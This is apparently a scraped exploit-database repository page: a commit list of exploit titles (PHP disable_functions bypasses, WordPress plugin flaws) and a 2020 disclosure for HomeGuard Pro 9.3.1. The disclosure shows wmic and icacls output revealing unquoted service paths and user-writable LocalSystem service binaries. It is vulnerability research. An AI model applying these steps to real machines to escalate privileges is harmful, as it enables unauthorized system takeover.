53517327e7
21 changes to exploits/shellcodes PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions Bypass PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / disable_functions Bypass PHP 5.x COM - Safe Mode / Disable Functions Bypass PHP 5.x COM - Safe Mode / disable_functions Bypass PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass HomeGuard Pro 9.3.1 - Insecure Folder Permissions EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path SprintWork 2.3.1 - Local Privilege Escalation Windows Kernel - Information Disclosure PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' disable_functions Bypass / Load Dynamic Library Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass PHP 7.0 < 7.3 (Unix) - 'gc' Disable Functions Bypass PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass VehicleWorkshop 1.0 - 'bookingid' SQL Injection Wordpress Plugin tutor.1.5.3 - Local File Inclusion Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting Wordpress Plugin wordfence.7.4.5 - Local File Disclosure Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload phpMyChat Plus 1.98 - 'pmc_username' SQL Injection WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
28 lines
No EOL
1.5 KiB
Text
28 lines
No EOL
1.5 KiB
Text
# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
|
|
# Exploit Author: boku
|
|
# Date: 2020-02-13
|
|
# Vendor Homepage: https://veridium.net
|
|
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
|
|
# Version 9.3.1
|
|
# Tested On: Windows 10 (32-bit)
|
|
|
|
# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions
|
|
|
|
## Service Information (Unquoted Service Path)
|
|
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
|
|
Name PathName StartMode StartName
|
|
HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem
|
|
HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem
|
|
HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem
|
|
HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem
|
|
|
|
## Insecure Folder Permission
|
|
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
|
|
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)
|
|
|
|
## Insecure File/Service Permission
|
|
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
|
|
C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F)
|
|
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
|
|
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
|
|
C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F) |